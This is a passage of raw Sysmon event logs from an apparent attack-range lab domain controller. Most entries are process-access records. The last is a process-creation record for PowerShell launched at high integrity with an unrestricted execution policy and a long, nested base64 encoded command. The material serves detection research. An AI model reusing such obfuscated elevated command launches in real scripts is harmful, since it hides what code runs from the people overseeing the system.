2\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5042,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5043,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5044,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.737\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:11.737","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CF-5F25-0000-00108EF70700}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:11.746\r\nProcessGuid: {41C8662E-20CF-5F25-0000-00105DF80700}\r\nProcessId: 4720\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20CF-5F25-0000-00108EF70700}\r\nParentProcessId: 4092\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 